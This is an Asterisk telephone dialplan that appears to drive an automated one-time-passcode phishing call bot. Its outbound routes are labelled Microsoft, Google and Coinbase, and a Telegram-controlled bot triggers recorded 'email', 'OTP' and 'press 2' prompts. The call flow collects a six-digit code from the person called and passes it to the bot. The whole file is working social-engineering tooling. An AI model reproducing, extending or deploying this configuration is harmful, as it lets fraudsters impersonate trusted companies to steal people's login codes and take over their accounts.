[general]
autofallthrough=yes

[globals]
CHANNEL_STATE_FILE=/tmp/channel_state.txt
CURRENT_CHANNEL=
CURRENT_UNIQUEID=

[call-flow]
exten => start,1,NoOp(Interactive Call Flow Started)
 same => n,Answer()
 same => n,Wait(1)
 same => n,Set(CHANNEL(tonezone)=us)
 same => n,Set(DTMFEVENT=yes)
 same => n,UserEvent(CallAnswered,Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Playback(/usr/share/asterisk/sounds/uploads/1)
 same => n,UserEvent(PlaybackComplete,File:1,Channel:${CHANNEL})
 same => n,Set(TIMEOUT(digit)=5)
 same => n,Set(TIMEOUT(response)=30)
 same => n,WaitExten(30)
 same => n,Goto(timeout,1)

exten => 1,1,NoOp(User pressed 1 - Telegram menu)
 same => n,UserEvent(MenuOption,Option:1,Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Playback(silence/1)
 same => n,Goto(wait-for-bot,1)

exten => wait-for-bot,1,NoOp(Waiting for bot command)
 same => n,UserEvent(WaitingForBot,Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Read(DUMMY,silence/1,1,,1,60)
 same => n,Goto(wait-for-bot,1)

exten => dtmf-input,1,NoOp(Collecting DTMF input)
 same => n,Read(DTMF_CODE,silence/1,6,,3,10)
 same => n,GotoIf($[${LEN(${DTMF_CODE})} = 6]?valid-code:invalid-code)

exten => valid-code,1,NoOp(Valid 6-digit code: ${DTMF_CODE})
 same => n,UserEvent(DTMFCode,Code:${DTMF_CODE},Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Goto(wait-for-bot,1)

exten => invalid-code,1,NoOp(Invalid code entered)
 same => n,UserEvent(InvalidCode,Code:${DTMF_CODE},Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Playback(/usr/share/asterisk/sounds/uploads/invalidcode)
 same => n,Goto(dtmf-input,1)

exten => timeout,1,NoOp(Call timeout)
 same => n,UserEvent(CallTimeout,Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Playback(/usr/share/asterisk/sounds/uploads/invalidcode)
 same => n,Hangup()

exten => i,1,NoOp(Invalid input)
 same => n,UserEvent(InvalidInput,Channel:${CHANNEL},UniqueID:${UNIQUEID})
 same => n,Playback(/usr/share/asterisk/sounds/uploads/invalidcode)
 same => n,Goto(start,9)

[bot-commands]
exten => play-email,1,NoOp(Playing email audio)
 same => n,Playback(/usr/share/asterisk/sounds/uploads/email6)
 same => n,UserEvent(PlaybackComplete,File:email6,Channel:${CHANNEL})
 same => n,Goto(call-flow,wait-for-bot,1)

exten => play-otp,1,NoOp(Playing OTP audio)
 same => n,Playback(/usr/share/asterisk/sounds/uploads/otp6)
 same => n,UserEvent(PlaybackComplete,File:otp6,Channel:${CHANNEL})
 same => n,Goto(call-flow,wait-for-bot,1)

exten => play-invalid,1,NoOp(Playing invalid code audio)
 same => n,Playback(/usr/share/asterisk/sounds/uploads/invalidcode)
 same => n,UserEvent(PlaybackComplete,File:invalidcode,Channel:${CHANNEL})
 same => n,Goto(call-flow,wait-for-bot,1)

exten => play-tts,1,NoOp(Playing TTS message)
 same => n,Playback(/tmp/tts_message)
 same => n,UserEvent(PlaybackComplete,File:tts_message,Channel:${CHANNEL})
 same => n,Goto(call-flow,wait-for-bot,1)

exten => play-press2,1,NoOp(Playing press2 and continuing)
 same => n,Playback(/usr/share/asterisk/sounds/uploads/press2)
 same => n,UserEvent(PlaybackComplete,File:press2,Channel:${CHANNEL})
 same => n,Goto(call-flow,dtmf-input,1)

[outbound-microsoft]
exten => _X.,1,Goto(call-flow,start,1)

[outbound-google]
exten => _X.,1,Goto(call-flow,start,1)

[outbound-coinbase]
exten => _X.,1,Goto(call-flow,start,1)
